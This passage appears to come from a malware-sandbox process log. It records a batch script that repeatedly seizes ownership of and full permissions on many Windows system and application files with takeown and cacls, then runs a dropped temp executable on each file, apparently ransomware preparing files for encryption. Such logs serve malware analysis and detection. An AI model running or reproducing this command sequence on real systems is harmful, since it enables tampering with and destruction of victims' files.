      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
      4⤵
      PID:300
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2""
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2"
    3⤵
    - Modifies file permissions
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "settings.dat.LOG2" -nobanner
    3⤵
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "settings.dat.LOG2" -nobanner
      4⤵
      PID:296
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:4304
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:4500
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "Data1.cab" -nobanner
    3⤵
    PID:3224
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "Data1.cab" -nobanner
      4⤵
      PID:1716
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    - Modifies file permissions
    PID:4320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:4540
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:3080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:4760
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:4448
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:3416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:428
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:2408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    - Modifies file permissions
    PID:4884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:4792
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:5108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    PID:2972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:268
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:4952
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5032
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:4136
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:4260
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:4220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:4140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:276
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:4376
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:296
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man""
  2⤵
  PID:2116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man" /E /G Admin:F /C
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man"
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "msoutilstat.etw.man" -nobanner
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "msoutilstat.etw.man" -nobanner
      4⤵
      PID:4548
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:2580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4464
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4540
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Modifies file permissions
    PID:3080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:4456
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4600
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\MF\Pending.GRL""
  2⤵
  PID:3772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\MF\Pending.GRL" /E /G Admin:F /C
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\MF\Pending.GRL"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "Pending.GRL" -nobanner
    3⤵
    PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "Pending.GRL" -nobanner
      4⤵
      PID:4908
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs""
  2⤵
  PID:4712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs" /E /G Admin:F /C
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs"
    3⤵
    - Modifies file permissions
    PID:5060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "edbres00001.jrs" -nobanner
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "edbres00001.jrs" -nobanner
      4⤵
      PID:3016
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:4952
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:2948
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4212
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:4044
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4436
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:4352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    - Modifies file permissions
    PID:732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:4272
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml""
  2⤵
  PID:4432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:3528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
    3⤵
    PID:4164
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2013Win32.xml" -nobanner
      4⤵
      PID:4296
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml""
  2⤵
  PID:1908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"
    3⤵
    - Modifies file permissions
    PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
    3⤵
    PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner
      4⤵
      PID:4504
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
    3⤵
    PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner
      4⤵
      PID:2212
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4672
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\User Account Pictures\guest.png""
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\User Account Pictures\guest.png" /E /G Admin:F /C
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\User Account Pictures\guest.png"
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "guest.png" -nobanner
    3⤵
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "guest.png" -nobanner
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft OneDrive\setup\refcount.ini""
  2⤵
  PID:4864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft OneDrive\setup\refcount.ini" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft OneDrive\setup\refcount.ini"
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\cmd.exe
